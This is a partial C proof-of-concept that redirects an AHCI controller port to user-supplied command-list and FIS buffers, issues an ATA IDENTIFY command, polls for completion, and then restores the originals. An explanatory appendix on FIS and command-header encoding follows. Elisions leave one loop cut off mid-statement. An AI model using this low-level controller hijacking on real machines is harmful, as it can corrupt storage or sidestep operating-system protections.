        tmp = hbap->cmd;
        hbap->cmd |= tmp | 1;
        // hbap->sact = 1; // required when issuing NCQ command
        hbap->ci = 1; // slot 0 XXX - needs to be dynamic if different slot
                      // in use
        memcpy(last_cmd_page, cmd_list, PAGE_SIZE);
        sleep(1);
        complete = 0;
        printf("interrupt status after: 0x%x\n", hbap->is);
        print_interrupt_bits(hbap->is);

        // Wait for something to use our physical address
        printf("Waiting for command completion\n");
        done = 0;
        while (!done) {
            if ((hbap->ci & 1) == 0 && !complete) {
                printf("Seems to have completed...\n");
                complete = 1;
            } else if (!complete) {
                printf("wasn't complete\n");
            }
            if ((hbap->is & PORT_IRQ_TF_ERR)) {
                print_interrupt_bits(hbap->is);
                print_ahci_port(hbap);
                printf("Task file error\n");
                printf("tfd: 0x%x\n", hbap->tfd);
                printf("DIAG error\n");
                printf("diag: 0x%x\n", hbap->serr);
                hexdump(dma, 256);
                break;
            }
            sleep(1);
            for (i = 0; i /* [...] */
        /* [...] */fb = orig_fis;
        hbap->fbu = orig_fisu;
        hbap->clb = orig_cmd_list;
        hbap->clbu = orig_cmd_listu;

        enable_interrupts(p);

        munmap(dma, PAGE_SIZE);
        munmap(cmd_list, PAGE_SIZE);
        munmap(cmd, PAGE_SIZE);
        munmap(fis_buf, PAGE_SIZE);
        munmap(ptr, total_read_size);
        close(fd);
        return 0;
    }
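For readers following the H2D FIS and command-header setup in the code, the sketch below builds the same kinds of structures in isolation. It assumes the standard SATA Register Host-to-Device FIS layout (type 0x27, the C bit in bit 7 of byte 1, the command in byte 2, five dwords long) and the AHCI encodings for command-header DW0 (CFL in bits 4:0, W in bit 6, PRDTL in bits 31:16) and the PRD byte count (byte count minus one in bits 21:0). The helper names are hypothetical, and 0xEC is the ATA IDENTIFY DEVICE opcode that the PoC refers to as ATA_CMD_ID_ATA.

```c
#include <stdint.h>
#include <string.h>

#define FIS_TYPE_REG_H2D 0x27 /* Register FIS, host to device */
#define ATA_CMD_IDENTIFY 0xEC /* ATA IDENTIFY DEVICE */

/* Fill a 20-byte Register H2D FIS carrying an ATA command.
 * Returns the FIS length in dwords, the value for the header's CFL field. */
unsigned build_h2d_fis(uint8_t fis[20], uint8_t command)
{
    memset(fis, 0, 20);
    fis[0] = FIS_TYPE_REG_H2D;
    fis[1] = 1u << 7; /* C bit: this FIS updates the command register */
    fis[2] = command;
    return 5;
}

/* DW0 of an AHCI command header: CFL (bits 4:0), W (bit 6), PRDTL (31:16). */
uint32_t ahci_cmd_hdr_dw0(unsigned cfl, int write, unsigned prdtl)
{
    return ((uint32_t)prdtl << 16) | (write ? 1u << 6 : 0u) | (cfl & 0x1f);
}

/* PRD data byte count field: byte count minus one in bits 21:0, matching
 * the (buf_len - 1) & 0x3fffff computation in the PoC. */
uint32_t ahci_prd_dbc(uint32_t byte_count)
{
    return (byte_count - 1) & 0x3fffff;
}
```

For the IDENTIFY case the header would carry CFL 5, W 0 (the data flows from the device) and one PRD entry covering the 512-byte ATA_ID_WORDS buffer.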